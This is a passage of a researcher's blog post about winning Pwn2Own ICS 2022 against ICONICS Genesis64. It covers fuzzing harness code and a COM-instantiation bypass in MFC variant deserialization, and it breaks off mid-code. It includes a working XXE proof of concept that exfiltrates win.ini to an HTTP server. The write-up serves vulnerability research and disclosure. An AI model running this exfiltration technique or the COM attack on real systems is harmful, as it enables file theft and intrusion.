Competing in Pwn2Own ICS 2022 Miami: Exploiting a zero click remote memory corruption in ICONICS Genesis64

🧾 Introduction

After participating in Pwn2Own Austin in 2021 and failing to land my remote kernel exploit Zenith (which you can read about here), I was eager to try again. It is fun and forces me to look at things I would never have looked at otherwise. The one thing I couldn't do during my last participation in 2021 was to fly on-site and soak in the whole experience. I wanted a massive adrenaline rush on stage (as opposed to being in the comfort of my home), to hang out, to socialize and learn from the other contestants.







So when ZDI announced an in-person competition in Miami in 2022.. I was stoked but I knew nothing about Industrial Control System software (I still don't 😅). After googling around, I realized that several of the targets ran on Windows 😮 which is the OS I am most familiar with, so that was a big plus given the timeline. The ZDI originally announced the contest at the end of October 2021, and it was supposed to happen about three months later, in January 2022.



In this blog post, I'm hoping to walk you through my journey of participating & demonstrating a winning 0-click remote entry on stage in Miami 🛬. If you want to skip the details to the exploit code, everything is available on my GitHub repository Paracosme.

⚙️ Target selection

All right, let me set the stage. It is November 2021 in Seattle; the sun sets early, it is cozy and warm inside; and I have decided to try to participate in the contest. As I mentioned in the intro, I have about three months to discover an exploitable vulnerability and write a reliable enough exploit for it. Honestly, I thought that timeline was a bit tight given that I can only invest an hour or two on average per workday (probably double that for weekends). As a result, progress will be slow, and will require discipline to put in the hours after a full day of work 🫡. And if it doesn't go anywhere, then it doesn't. Things don't work out often in life, nothing new 🤷🏽♂️.



One thing I was excited about was to pick a target running on Windows to use my favorite debugger, WinDbg. Given the timeline, I felt good about not having to fight with gdb and/or lldb 🤢. But as I said above, I have no experience with anything related to ICS software. I don't know what it's supposed to do, where, how, when. Although I tried to educate myself as much as possible by reading all the literature I could find, I quickly realized that the infosec community didn't cover it that much.

Regarding the contest, the ZDI broke it down into four main categories with multiple targets, vectors, and cash prizes. Reading through the rules, I didn't really recognize any of the vendors, everything was very foreign to me. So, I started to look for something that checked a few boxes:



- I need to run a demo version of the software in a regular Windows VM to introspect the target easily through a debugger. I learned my lessons from my Zenith exploit where I couldn't debug my exploit on the real target. This time, I want to be able to debug the exploit on the real target to stand a chance to have it land during the contest.

- The target is written in a memory unsafe language like C or C++. It is nicer to reverse-engineer and certainly contains memory safety issues that I could use. In hindsight, it probably wasn't the best choice. Most of the other contestants exploited logic vulnerabilities which are in general: more reliable to exploit (less chance to lose the cash prize, less time spent building the exploit), and might be easier to find (more tooling opportunities?).

- Existing research/documentation/anything I can build on top of would be amazing.







After trying a few things for a week or two, I decided to target ICONICS Genesis64 in the Control Server category via the 0 click over-the-network vector. An ethernet cable is connecting you to the target device, and you throw your exploit against one of Genesis64's listening sockets and need to demonstrate code execution without any user interaction 🔥.

Luigi Auriemma published a plethora of vulnerabilities affecting the GenBroker64.exe server (which is part of Genesis64) in 2011. Many of those bugs look powerful and shallow, which gave me confidence that plenty more still exist today. At the same time, it was the only public thing I found, and it was a decade old, which is... a very long time ago.

🐛 Vulnerability research







I started the adventure a few weeks after the official announcement by downloading a demo version of the software, installing it in a VM, and starting to reverse-engineer the GenBroker64.exe service with laser focus. GenBroker64.exe is a regular Windows program available in both 32-bit and 64-bit versions, but it will ultimately run on a modern 64-bit Windows 10 with the default configuration. In hindsight, I made a mistake and didn't spend enough time enumerating the attack surfaces available. Instead, I went after the same ones as Luigi when there were probably better / less explored candidates. Live and learn I guess 😔.







I opened the file in IDA and got confused at first as it thinks it is a .NET binary. This contradicted Luigi's findings I looked at previously 🤔.



I ignored it, and looked for the code that manages the listening TCP socket on port 38080. I found that entry point and it was definitely written in C++ so the binary might just be a mix of .NET & C++ 🤷🏽♂️. Regardless, I didn't spend time trying to understand the whys, I just got going on the grind instead. Reverse-engineering it, function by function, understanding more and more the various structures and software abstractions. You know how this goes. Making your Hex-Rays output pretty, having ten different variables named dunno_x and all that fun stuff.

Understanding the target

After a month of daily reverse-engineering, I was moving along, and I felt like I understood better the first order attack surfaces exposed by port 38080. It doesn't mean I understood everything going on, but I was building expertise. GenBroker64.exe appeared to be brokering conversations between a client and maybe some ICS hardware. Who knows. I had a good understanding of this layer that received custom "messages" that were made of more primitive types: strings, arrays of strings, integers, VARIANTs, etc. This layer looked like the very area Luigi attacked in 2011. I could see extra checks added here and there. I guess I was on the right track.

I was also seeing a lot of things related to the Microsoft Foundation Class (MFC) library, which I needed to familiarize myself with. Things like CArchive, ATL::CString, etc.

I started to see bugs and low-severity security issues like divisions by zero, null dereferences, infinite recursions, out-of-bounds reads, etc. Although it felt comforting for a minute, those issues were far from what I needed to pop calc remotely without user interaction. On the right track still, but no cigar. The clock was ticking, and I started to wonder if fuzzing could be helpful. The deserialization layer surface was suitable for fuzzing, and I probably could harness the target quickly thanks to the accumulated expertise. The wtf fuzzer I released a bit ago seemed like a good candidate, and so that's what I used. It's always a special feeling when a tool you wrote is solving one of your problems 🙏 The plan was to kick off some fuzzing quickly while I continued on exploring the surface manually.

Harnessing the target

The custom messages received by GenBroker64.exe are stored in a receive buffer that looks like the following:

struct TcpRecvBuffer_t {

TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }

uint64_t Vtbl;

uint64_t m_hFile;

uint64_t m_bCloseOnDelete;

uint64_t m_strFileName;

uint32_t m_dFoo;

uint32_t m_pTM;

uint64_t m_nGrowBytes;

uint64_t m_nPosition;

uint64_t m_nBufferSize;

uint64_t m_nFileSize;

uint64_t m_lpBuffer;

};



m_lpBuffer points to the raw bytes received off the socket, and so injecting the test case in memory should be straightforward. I put together a client that sent a large packet (0x1'000 bytes long) to ensure there would be enough storage in the buffer to fuzz. I took a snapshot of GenBroker64.exe just after the relevant WSOCK32!recv call, as you can see below:

GenBroker64+0x83dd0:

00000001`40083dd0 83f8ff cmp eax,0FFFFFFFFh

kd> ub .

00000001`40083dc0 4053 push rbx

00000001`40083dc2 4883ec30 sub rsp,30h

00000001`40083dc6 488b4908 mov rcx,qword ptr [rcx+8]

00000001`40083dca ff15b8aa0200 call qword ptr [GenBroker64+0xae888 (00000001`400ae888)]

kd> dqs 00000001`400ae888

00000001`400ae888 00007ffb`f27e1010 WSOCK32!recv

kd> r @rax

rax=0000000000001000

kd> kp

# Child-SP RetAddr Call Site

00 00000000`0a48fb10 00000001`4008a9fc GenBroker64+0x83dd0

01 00000000`0a48fb50 00000001`40086783 GenBroker64+0x8a9fc

02 00000000`0a48fdf0 00000001`4008609d GenBroker64+0x86783

03 00000000`0a48fe20 00007ffc`0cd07bd4 GenBroker64+0x8609d

04 00000000`0a48ff30 00007ffc`0db0ce71 KERNEL32!BaseThreadInitThunk+0x14

05 00000000`0a48ff60 00000000`00000000 ntdll!RtlUserThreadStart+0x21

Then, I wrote a simple fuzzer module that writes the test case at the end of the receive buffer so that out-of-bounds memory accesses trigger an access violation when they hit the guard page behind it. I also updated the number of bytes received by recv (returned in rax) as well as the start address (m_lpBuffer). A pointer to the TcpRecvBuffer_t structure was saved on the stack. This is what the module looked like:

bool InsertTestcase(const uint8_t *Buffer, const size_t BufferSize) {

const uint64_t MaxBufferSize = 0x1'000;

if (BufferSize > MaxBufferSize) {

return true;

}

struct TcpRecvBuffer_t {

TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }

uint64_t Vtbl;

uint64_t m_hFile;

uint64_t m_bCloseOnDelete;

uint64_t m_strFileName;

uint32_t m_dFoo;

uint32_t m_pTM;

uint64_t m_nGrowBytes;

uint64_t m_nPosition;

uint64_t m_nBufferSize;

uint64_t m_nFileSize;

uint64_t m_lpBuffer;

};

static_assert(offsetof(TcpRecvBuffer_t, m_lpBuffer) == 0x48);

//

// Calculate and read the TcpRecvBuffer_t pointer saved on the stack.

//

const Gva_t Rsp = Gva_t(g_Backend->GetReg(Registers_t::Rsp));

const Gva_t TcpRecvBufferAddr = g_Backend->VirtReadGva(Rsp + Gva_t(0x30));

//

// Read the TcpRecvBuffer_t structure.

//

TcpRecvBuffer_t TcpRecvBuffer;

if (!g_Backend->VirtReadStruct(TcpRecvBufferAddr, &TcpRecvBuffer)) {

fmt::print("VirtReadStruct failed to read the TcpRecvBuffer_t at {:#x}\n",

TcpRecvBufferAddr.U64());

return false;

}

//

// Calculate the testcase address so that it is pushed towards the end of the

// page to benefit from the guard page.

//

const Gva_t BufferEnd = Gva_t(TcpRecvBuffer.m_lpBuffer + MaxBufferSize);

const Gva_t TestcaseAddr = BufferEnd - Gva_t(BufferSize);

//

// Insert testcase in memory.

//

if (!g_Backend->VirtWriteDirty(TestcaseAddr, Buffer, BufferSize)) {

fmt::print("VirtWriteDirty failed to write testcase at {}\n",

fmt::ptr(Buffer));

return false;

}

//

// Set the size of the testcase.

//

g_Backend->SetReg(Registers_t::Rax, BufferSize);

//

// Update the buffer address.

//

TcpRecvBuffer.m_lpBuffer = TestcaseAddr.U64();

if (!g_Backend->VirtWriteStructDirty(TcpRecvBufferAddr, &TcpRecvBuffer)) {

fmt::print("VirtWriteDirty failed to update the TcpRecvBuffer.m_lpBuffer "

"pointer\n");

return false;

}

return true;

}
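The placement arithmetic used by the module above can be isolated into a tiny helper. This is only a sketch: `TestcaseAddress` and `CrossesBufferEnd` are hypothetical names that are not part of wtf, and they assume (like the module does) that the receive buffer spans exactly `MaxBufferSize` bytes and that an inaccessible page sits right behind it.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper (not part of wtf): returns the address where a test
// case of `Size` bytes must start so that its last byte is also the last
// byte of a buffer spanning [BufferStart, BufferStart + MaxBufferSize).
uint64_t TestcaseAddress(uint64_t BufferStart, uint64_t MaxBufferSize,
                         uint64_t Size) {
  // Larger test cases are expected to be filtered out by the caller.
  assert(Size <= MaxBufferSize);
  return BufferStart + MaxBufferSize - Size;
}

// Hypothetical helper: returns true if reading `Length` bytes at `Offset`
// inside a test case of `Size` bytes runs past the end of the buffer, which
// is where the guard page would fault.
bool CrossesBufferEnd(uint64_t Size, uint64_t Offset, uint64_t Length) {
  return Offset + Length > Size;
}
```

For instance, with a buffer at 0x10000 and a 0x10-byte test case, the test case starts at 0x10ff0, and an 8-byte read at offset 0xc of the test case would cross into the page behind the buffer.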

When harnessing a target with wtf, there are numerous events or API calls that can't execute properly inside the runtime environment. I/Os and context switches are a few examples but there are more. Knowing how to handle those events is usually entirely target specific. It can be as easy as nop-ing a call and as tricky as emulating the effect of a complex API. This is a tricky balancing act because you want to avoid forcing your target into acting differently than it would when executed for real. Otherwise you risk running into bugs that only exist in the reality you built 👾.

Thankfully, GenBroker64.exe wasn't too bad; I nop'd a few functions that lead to I/Os but they didn't impact the code I was fuzzing:

bool Init(const Options_t &Opts, const CpuState_t &) {

//

// Make ExGenRandom deterministic.

//

// kd> ub fffff805`3b8287c4 l1

// nt!ExGenRandom+0xe0:

// fffff805`3b8287c0 480fc7f2 rdrand rdx

const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);

if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {

DebugPrint("Hit ExGenRandom!\n");

Backend->Rdx(Backend->Rdrand());

})) {

return false;

}

const uint64_t GenBroker64Base = g_Dbg.GetModuleBase("GenBroker64");

const Gva_t EndFunct = Gva_t(GenBroker64Base + 0x85FCC);

if (!g_Backend->SetBreakpoint(EndFunct, [](Backend_t *Backend) {

DebugPrint("Finished!\n");

Backend->Stop(Ok_t());

})) {

return false;

}

if (!g_Backend->SetBreakpoint(

"combase!CoCreateInstance", [](Backend_t *Backend) {

DebugPrint("combase!CoCreateInstance({:#x})\n",

Backend->VirtRead8(Gva_t(Backend->Rcx())));

g_Backend->Stop(Ok_t());

})) {

return false;

}

const Gva_t DnsCacheIsKnownDns(0x1400794F0);

if (!g_Backend->SetBreakpoint(DnsCacheIsKnownDns, [](Backend_t *Backend) {

DebugPrint("DnsCacheIsKnownDns\n");

g_Backend->SimulateReturnFromFunction(0);

})) {

return false;

}

const Gva_t CMemFileGrowFile(0x14009653B);

if (!g_Backend->SetBreakpoint(CMemFileGrowFile, [](Backend_t *Backend) {

DebugPrint("CMemFile::GrowFile\n");

g_Backend->Stop(Ok_t());

})) {

return false;

}

if (!g_Backend->SetBreakpoint("KERNELBASE!Sleep", [](Backend_t *Backend) {

DebugPrint("KERNELBASE!Sleep\n");

g_Backend->Stop(Ok_t());

})) {

return false;

}

if (!g_Backend->SetBreakpoint("nt!MiIssuePageExtendRequest",

[](Backend_t *Backend) {

DebugPrint("nt!MiIssuePageExtendRequest\n");

g_Backend->Stop(Ok_t());

})) {

return false;

}

//

// Install the usermode crash detection hooks.

//

if (!SetupUsermodeCrashDetectionHooks()) {

return false;

}

return true;

}

I manually crafted a few packets to be used as a corpus, ran it on my laptop, and finally went to bed calling it quits for the day 😴. I woke up the following day and was welcomed with a few findings. Exciting. It's like waking up early on Christmas morning, hoping to find gifts under the tree 🎄. Though, after looking at them, reality came back pretty fast. I realized that all the findings were some of the low-severity issues I mentioned earlier. Oh well, whatever; that's how it goes sometimes. I improved the corpus a little bit, and let the fuzzer drill through the code.



Pressure was building up as the deadline approached. I felt my progress was stalling, and it didn't feel good. I reverse-engineered myself enough times to know that I needed somewhat of a break to recharge my batteries a bit. What works best for me is to accomplish something easy, and measurable to get a supply of dopamine. I decided to get back to the fuzzer I had been running unsupervised.

Triaging findings

wtf doesn't know how to handle I/Os, and it stops when a context switch occurs to prevent executing code from a different process. Those behaviors combined mean that the fuzzer often runs into situations that lead to a context switch. In general, it is a symptom of poor harnessing because the execution of your test case is interrupted before it probably should have been.



I had many of those test cases, so looking at them closely was both rewarding, and a good way to improve the fuzzing campaign. In general, this is pretty time-consuming because it highlights an area of the code you don't know much about, and you need to answer the question "how to handle it properly". Unfortunately, "debugging" test cases in wtf is basic; you have an execution trace that spans user and kernel-mode. It's usually gigabytes long so you are literally scrolling looking for a needle in a hell of a haystack 🔎.



I eventually found a very bizarre one. The execution stopped while trying to load a COM object, which triggered an I/O followed by a context switch. After looking closer, it seemed to be triggered from an area of code (I thought) I knew very well: that deserialization layer I mentioned. Another surprise was that the COM's class identifier came directly from the test case bytes... what the hell? 😮 Instantiating an arbitrary COM object? Exciting and wild I thought. I first assumed this was a bug I had introduced when harnessing or inserting the test case in memory. I built a proof-of-concept to reproduce and debug this live.. and I indeed stepped-through the code that read a class ID, and instantiated any COM object.

The code was part of mfc140u.dll, and not GenBroker64.exe, which made me feel slightly better... I didn't miss it. I did miss a code-path that connected the deserialization layer to that function in mfc140u.dll. Missing something never feels great, but it is an essential part of the job. The best thing you can do is try to transform this event into a learning opportunity 🌈.





So, how did I miss this while spending so much time in this very area? The function doing the deserialization was a big switch-case statement where each case handles a specific message type. Each message is made of primitive types like strings, integers, arrays, etc. As an example, below is the function that handles the deserialization of messages with identifier 89AB:

void __fastcall PayloadReq89AB_t::ReadFromArchive(PayloadReq89AB_t *Payload, Archive_t *Archive) {

// ...

if ( (Archive->m_nMode & ArchiveReadMode) != 0 ) {

Archive::ReadUint32(Archive, Payload);

Utils::ReadVariant(&Payload->Variant1, Archive);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String1);

Archive::ReadUint32__(Archive, Payload->pad);

Archive::ReadUint32__(Archive, &Payload->pad[4]);

Archive::ReadUint32__(Archive, &Payload->pad[8]);

Archive::ReadUint32_(Archive, &Payload->pad[12]);

Utils::ReadVariant(&Payload->Variant2, Archive);

Utils::ReadVariant(&Payload->Variant3, Archive);

Utils::ReadVariant(&Payload->Variant4, Archive);

Utils::ReadVariant(&Payload->Variant5, Archive);

Utils::ReadVariant(&Payload->Variant6, Archive);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String2);

Archive::ReadUint32(Archive, &Payload->D0);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String3);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String4);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String5);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String6);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String7);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String8);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String9);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringA);

Archive::ReadUint32(Archive, &Payload->Q90);

Utils::ReadVariant(&Payload->Variant7, Archive);

Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringB);

Archive::ReadUint32(Archive, &Payload->Dunno);

}

// ...

}

One of the primitive types is a VARIANT. For those unfamiliar with this structure, it is used a lot in Windows, and is made of an integer that tells you how to interpret the data that follows. The type is an integer followed by a giant union:

typedef struct tagVARIANT {

union {

struct {

VARTYPE vt;

WORD wReserved1;

WORD wReserved2;

WORD wReserved3;

union {

LONGLONG llVal;

LONG lVal;

BYTE bVal;

SHORT iVal;

FLOAT fltVal;

DOUBLE dblVal;

VARIANT_BOOL boolVal;

VARIANT_BOOL __OBSOLETE__VARIANT_BOOL;

SCODE scode;

CY cyVal;

DATE date;

BSTR bstrVal;

IUnknown *punkVal;

IDispatch *pdispVal;

SAFEARRAY *parray;

BYTE *pbVal;

SHORT *piVal;

LONG *plVal;

LONGLONG *pllVal;

FLOAT *pfltVal;

DOUBLE *pdblVal;

VARIANT_BOOL *pboolVal;

VARIANT_BOOL *__OBSOLETE__VARIANT_PBOOL;

SCODE *pscode;

CY *pcyVal;

DATE *pdate;

BSTR *pbstrVal;

IUnknown **ppunkVal;

IDispatch **ppdispVal;

SAFEARRAY **pparray;

VARIANT *pvarVal;

PVOID byref;

CHAR cVal;

USHORT uiVal;

ULONG ulVal;

ULONGLONG ullVal;

INT intVal;

UINT uintVal;

DECIMAL *pdecVal;

CHAR *pcVal;

USHORT *puiVal;

ULONG *pulVal;

ULONGLONG *pullVal;

INT *pintVal;

UINT *puintVal;

struct {

PVOID pvRecord;

IRecordInfo *pRecInfo;

} __VARIANT_NAME_4;

} __VARIANT_NAME_3;

} __VARIANT_NAME_2;

DECIMAL decVal;

} __VARIANT_NAME_1;

} VARIANT;



Utils::ReadVariant is the name of the function that reads a VARIANT from a stream of bytes, and it roughly looked like this:

void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {

TRY {

return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);

} CATCH_ALL(e) {

VariantClear(Variant);

}

}

HRESULT Utils::ReadVariant_(tagVARIANT *Variant, Archive_t *Archive, int Level) {

VARTYPE VarType = Archive.ReadUint16();

if((VarType & VT_ARRAY) != 0) {

// Special logic to unpack arrays..

return ..;

}

Size = VariantTypeToSize(VarType);

if (Size) {

Variant->vt = VarType;

return Archive.ReadInto(&Variant->decVal.8, Size);

}

if(!CheckVariantType(VarType)) {

// ...

throw Something();

}

return Archive >> Variant; // operator>> is imported from MFC

}

The last Archive>>Variant statement in Utils::ReadVariant_ is actually what calls into the mfc140u module, and it is also the function that loads the COM object. I basically ignored it and thought it wouldn't be interesting 😳. Code that interacts with different subsystems and/or third-party APIs is actually very important to audit for security issues. Those components might even have been written by different people or teams. They might have had different levels of scrutiny, different levels of quality, or different threat models altogether. That API might expect to receive sanitized data when you might be feeding it data arbitrarily controlled by an attacker. All of the above makes it very likely for a developer to introduce a mistake that can lead to a security issue. Anyways, tough pill to swallow.

First, ReadVariant_ reads an integer to know what the variant holds. If it is an array, then it is handled by another function. VariantTypeToSize is a tiny function that returns the number of bytes to read based on the variant's type:

size_t VariantTypeToSize(VARTYPE VarType) {

switch(VarType) {

case VT_I1: return 1;

case VT_UI2: return 2;

case VT_UI4:

case VT_INT:

case VT_UINT:

case VT_HRESULT:

return 4;

case VT_I8:

case VT_UI8:

case VT_FILETIME:

return 8;

default:

return 0;

}

}

It's important to note that it ignores anything that isn't integer-like (uint8_t, uint16_t, uint32_t, etc.) by returning zero. Otherwise, it returns the number of bytes that need to be read for the variant's content. Makes sense right? If VariantTypeToSize returns zero, then CheckVariantType is used as sanitization to only allow certain types:

bool CheckVariantType(VARTYPE VarType) {

if((VarType & 0x2FFF) != VarType) {

return false;

}

switch(VarType & 0xFFF) {

case VT_EMPTY:

case VT_NULL:

case VT_I2:

case VT_I4:

case VT_R4:

case VT_R8:

case VT_CY:

case VT_DATE:

case VT_BSTR:

case VT_ERROR:

case VT_BOOL:

case VT_VARIANT:

case VT_I1:

case VT_UI1:

case VT_UI2:

case VT_UI4:

case VT_I8:

case VT_UI8:

case VT_INT:

case VT_UINT:

case VT_HRESULT:

case VT_FILETIME:

return true;

break;

default:

return false;

}

}

Only certain types are allowed, otherwise Utils::ReadVariant_ throws an exception when CheckVariantType returns false. This looked solid to me.







The first trick is how the VT_EMPTY type is handled. If one is received, VariantTypeToSize returns zero and CheckVariantType returns true, which leads us right into mfc140u's operator>> function. So what though? How do we go from sending an empty variant to instantiating a COM object? 🤔

The second trick enters the room. When Utils::ReadVariant_ read the variant type, it consumed two bytes from the stream, which moved the buffer cursor forward. But MFC's operator>> also needs to know the variant type.. do you see where this is going now? To do that, it reads another two bytes off the stream.. which means that we are now able to send arbitrary variant types, and bypass the allow list in CheckVariantType. Pretty cool, huh?
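To make the two tricks concrete, here is a small portable model of the situation. It is a sketch under assumptions, not the real code: `Cursor`, `SizeFor`, `IsAllowed`, `LibraryRead`, `FrontEndRead` and `EffectiveType` are hypothetical stand-ins, the allow list is reduced to two types, and array handling is left out. The only thing it tries to show is that the type that gets validated and the type that gets acted on come from two different reads.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <vector>

// A few VARTYPE values from the Windows SDK.
constexpr uint16_t VtEmpty = 0;
constexpr uint16_t VtUnknown = 13;
constexpr uint16_t VtUi4 = 19;

// Toy little-endian reader standing in for the archive (hypothetical type).
class Cursor {
public:
  explicit Cursor(const std::vector<uint8_t> &Bytes) : Bytes_(Bytes) {}

  uint16_t ReadU16() {
    if (Bytes_.size() - Pos_ < 2) {
      throw std::out_of_range("short read");
    }
    const uint16_t Value = uint16_t(Bytes_[Pos_] | (Bytes_[Pos_ + 1] << 8));
    Pos_ += 2;
    return Value;
  }

  size_t Position() const { return Pos_; }

private:
  const std::vector<uint8_t> &Bytes_;
  size_t Pos_ = 0;
};

// Reduced stand-ins for VariantTypeToSize and CheckVariantType: only the
// types needed for the demonstration are modeled.
size_t SizeFor(uint16_t Vt) { return Vt == VtUi4 ? 4 : 0; }
bool IsAllowed(uint16_t Vt) { return Vt == VtEmpty || Vt == VtUi4; }

// Stand-in for MFC's operator>>: it reads the type from the stream itself.
uint16_t LibraryRead(Cursor &C) {
  // The front end has already consumed its own copy of the type.
  assert(C.Position() >= 2);
  return C.ReadU16();
}

// Stand-in for Utils::ReadVariant_ (array handling omitted). Returns the
// type that ends up driving the parsing.
uint16_t FrontEndRead(Cursor &C) {
  const uint16_t Vt = C.ReadU16();
  if (SizeFor(Vt) != 0) {
    return Vt; // Fixed-size path: the library is never reached.
  }
  if (!IsAllowed(Vt)) {
    throw std::runtime_error("variant type rejected");
  }
  return LibraryRead(C); // The library parses a second, unchecked type.
}

uint16_t EffectiveType(const std::vector<uint8_t> &Bytes) {
  Cursor C(Bytes);
  return FrontEndRead(C);
}
```

In this model, `EffectiveType({0x0d, 0x00})` throws because VT_UNKNOWN is not on the allow list, whereas `EffectiveType({0x00, 0x00, 0x0d, 0x00})` evaluates to 13 (VT_UNKNOWN): the leading VT_EMPTY satisfies the check, and the second type is the one the library acts on.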



As mentioned earlier, MFC is a library authored and shipped by Microsoft, so there's a good chance this function is documented somewhere. After googling around, I found its source code in my Visual Studio installation (C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\atlmfc\src\mfc\olevar.cpp) and it looked like this:

CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {

LPVARIANT pSrc = &varSrc;

ar >> pSrc->vt;

// ...

switch(pSrc->vt) {

// ...

case VT_DISPATCH:

case VT_UNKNOWN: {

LPPERSISTSTREAM pPersistStream = NULL;

CArchiveStream stm(&ar);

CLSID clsid;

ar >> clsid.Data1;

ar >> clsid.Data2;

ar >> clsid.Data3;

ar.EnsureRead(&clsid.Data4[0], sizeof clsid.Data4);

SCODE sc = CoCreateInstance(clsid, NULL,

CLSCTX_ALL | CLSCTX_REMOTE_SERVER,

pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,

(void**)&pSrc->punkVal);

if(sc == E_INVALIDARG) {

sc = CoCreateInstance(clsid, NULL,

CLSCTX_ALL & ~CLSCTX_REMOTE_SERVER,

pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,

(void**)&pSrc->punkVal);

}

AfxCheckError(sc);

TRY {

sc = pSrc->punkVal->QueryInterface(

IID_IPersistStream, (void**)&pPersistStream);

if(FAILED(sc)) {

sc = pSrc->punkVal->QueryInterface(

IID_IPersistStreamInit, (void**)&pPersistStream);

}

AfxCheckError(sc);

AfxCheckError(pPersistStream->Load(&stm));

} CATCH_ALL(e) {

if(pPersistStream != NULL) {

pPersistStream->Release();

}

pSrc->punkVal->Release();

THROW_LAST();

}

END_CATCH_ALL

pPersistStream->Release();

}

return ar;

}

}

A class identifier is indeed read directly from the archive, and a COM object is instantiated. Although we can instantiate any COM object, it needs to implement IID_IPersistStream or IID_IPersistStreamInit otherwise the function bails. If you are not familiar with this interface, here's what the MSDN says about it:

Enables the saving and loading of objects that use a simple serial stream for their storage needs.

You can serialize such an object with Save, send those bytes over a socket / store them on the filesystem, and recreate the object on the other side with Load. The other exciting detail is that the COM object loads itself from the stream in which we can place arbitrary content (via the socket).

This seemed highly insecure so I was over the moon. I knew there would be a way to exploit that behavior although I might not find a way in time. But I was convinced there has to be a way 💪🏽.



🔥 Exploit engineering: Building Paracosme

First, I wrote tooling to enumerate available COM objects implementing either of the interfaces on a freshly installed system, and loaded them one by one. While doing that, I ran into a couple of memory safety issues that I reported to MSRC as CVE-2022-21971 and CVE-2022-21974. It turns out RTF documents (loadable via Microsoft Word) can embed arbitrary COM class IDs that get instantiated via OleLoad. Once I had a list of candidates, I moved away from automation, and started to analyze them manually.



That search didn't yield much to be honest, which was disappointing. The only mildly interesting thing I found is a way to exfiltrate arbitrary files via an XXE. It was really nice because it's 100% reliable. I loaded an older MSXML (Microsoft XML, 2933BF90-7B36-11D2-B20E-00C04F983E60), and sent a crafted XML document in the stream to exfiltrate an arbitrary file to a remote HTTP server. Maybe this trick will be useful to somebody one day, so here is a repro:

#include <cinttypes>

#include <cstdio>

#include <cstdlib>

#include <cstdint>

#include <optional>

#include <shlwapi.h>

#include <string>

#include <unordered_map>

#include <windows.h>

#pragma comment(lib, "shlwapi.lib")

std::optional<GUID> Guid(const std::string &S) {

GUID G = {};

if (sscanf_s(S.c_str(),

"{%8" PRIx32 "-%4" PRIx16 "-%4" PRIx16 "-%2" PRIx8 "%2" PRIx8 "-"

"%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8

"}",

&G.Data1, &G.Data2, &G.Data3, &G.Data4[0], &G.Data4[1],

&G.Data4[2], &G.Data4[3], &G.Data4[4], &G.Data4[5], &G.Data4[6],

&G.Data4[7]) != 11) {

return std::nullopt;

}

return G;

}

int main(int argc, char *argv[]) {

const char *Key = "{2933BF90-7B36-11D2-B20E-00C04F983E60}";

const auto &ClassId = Guid(Key);

CoInitialize(nullptr);

if (!ClassId.has_value()) {

printf("Guid failed w/ '%s'\n", Key);

return EXIT_FAILURE;

}

printf("Trying to create %s\n", Key);

IUnknown *Unknown = nullptr;

HRESULT Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL,

IID_IUnknown, (LPVOID *)&Unknown);

if (FAILED(Hr)) {

Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL, IID_IDispatch,

(LPVOID *)&Unknown);

}

if (FAILED(Hr)) {

printf("Failed CoCreateInstance %s\n", Key);

return EXIT_FAILURE;

}

IPersistStream *PersistStream = nullptr;

Hr = Unknown->QueryInterface(IID_IPersistStream, (LPVOID *)&PersistStream);

DWORD Return = EXIT_SUCCESS;

if (SUCCEEDED(Hr)) {

printf("SUCCESS %s!\n", Key);

// - Content of xxe.dtd:

// ```

// <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">

// <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://localhost:8000/file?%payload;'>">

// %root;

// %oob;

// ```

const char S[] = R"(<?xml version="1.0"?>

<!DOCTYPE malicious [

<!ENTITY % sp SYSTEM "http://localhost:8000/xxe.dtd">

%sp;&root;

]>))";

IStream *Stream = SHCreateMemStream((const BYTE *)S, sizeof(S));

PersistStream->Load(Stream);

Stream->Release();

}

if (PersistStream) {

PersistStream->Release();

}

Unknown->Release();

return Return;

}

This is what it looks like when running it:







This felt somewhat like progress, but realistically it didn't get me closer to demonstrating remote code execution against the target 😒 I didn't think the ZDI would accept arbitrary file exfiltration as a way to demonstrate RCE, but in retrospect I probably should have asked. I also could have looked for an interesting file to exfiltrate; something with credentials that would allow me to escalate privileges somehow. But instead, I went back to the grind.







I had been playing with the COM thing for a while now, but something big had been in front of my eyes this whole time. One afternoon, I was messing around and started loading some of the candidates I gathered earlier, and GenBroker64.exe crashed 😮



First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

OLEAUT32!VarWeekdayName+0x22468:

00007ffa`e620c7f8 488b01 mov rax,qword ptr [rcx] ds:00000000`2e5a2fd0=????????????????

What the hell, I thought? I tried it again.. and the crash reproduced.

Understanding the bug

After looking at the code closer, I started to understand what was going on. In operator>> we can see that if the Load() call throws an exception, it is caught to clean up, and Release() both pPersistStream & pSrc->punkVal ([2]). That makes sense.

CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {

LPVARIANT pSrc = &varSrc;

ar >> pSrc->vt;

// ...

switch(pSrc->vt) {

// ...

case VT_DISPATCH:

case VT_UNKNOWN: {
